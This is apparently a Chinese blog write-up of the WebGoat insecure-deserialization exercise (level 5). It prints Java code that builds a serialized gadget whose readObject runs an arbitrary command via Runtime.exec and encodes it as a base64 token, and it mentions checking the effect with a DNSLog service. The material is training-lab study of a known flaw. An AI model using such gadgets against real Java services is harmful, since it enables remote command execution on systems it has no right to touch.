代码审计(Java)——WebGoat_InsecureDeserialization

level-5


　　找到java文件，可以看到传入的token经过64解码后输入导对象输入流中，然后没有加限制直接readObject进行了反序列化操作，确实存在漏洞点~

1. package org.owasp.webgoat.plugin;
3. import java.io.*;
4. import java.util.Base64;
6. public class ExploitDeserialize {
7.     public static void main(String[] args) throws IOException{
8.         GadgetObject goGadgetObject = new GadgetObject();
9.         goGadgetObject.setCmd("sleep(6)");
11.         ByteArrayOutputStream boStream = new ByteArrayOutputStream();
12.         ObjectOutputStream ooStream = new ObjectOutputStream(boStream);
13.         ooStream.writeObject(goGadgetObject);
14.         ooStream.flush();
15.         byte[] exp = boStream.toByteArray();
16.         String b64token = Base64.getEncoder().encodeToString(exp);
17.         System.out.println(b64token);
18.     }
19. }

复制代码

1. package org.owasp.webgoat.plugin;
3. import java.io.ObjectInputStream;
4. import java.io.Serializable;
6. public class GadgetObject implements Serializable {
7.     private String cmd;
9.     public void setCmd(String cmd) {
10.         this.cmd = cmd;
11.     }
13.     private void readObject( ObjectInputStream stream ) throws Exception {
14.         stream.defaultReadObject();
15.         try{
16.             Runtime r = Runtime.getRuntime();
17.             Process p = r.exec(cmd);
18.         }catch (Exception e) {
19.             e.printStackTrace();
20.         }
21.     }
22. }

复制代码

　　这里构造两个java文件，用来生成可以用的payload（因为反序列化这个东西，不同语言差别还是挺大的，就只能用残缺的java知识搞一个这个了……还是太菜了，java急需深造啊）

　　生成payload，让服务器等待5秒~

　　很奇怪的是没用行得通，很奇怪是那里搞错了，有可能是我写的java类有问题？？？我回头再去看一下……


　　这里开一个DNSLog来验证一下吧，不信这个邪~

　　果然，这里是可以访问到的，大概写的java也没有问题，但那是哪里出问题了嘞？？？真搞不懂，再研究研究，java水太深了……
 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！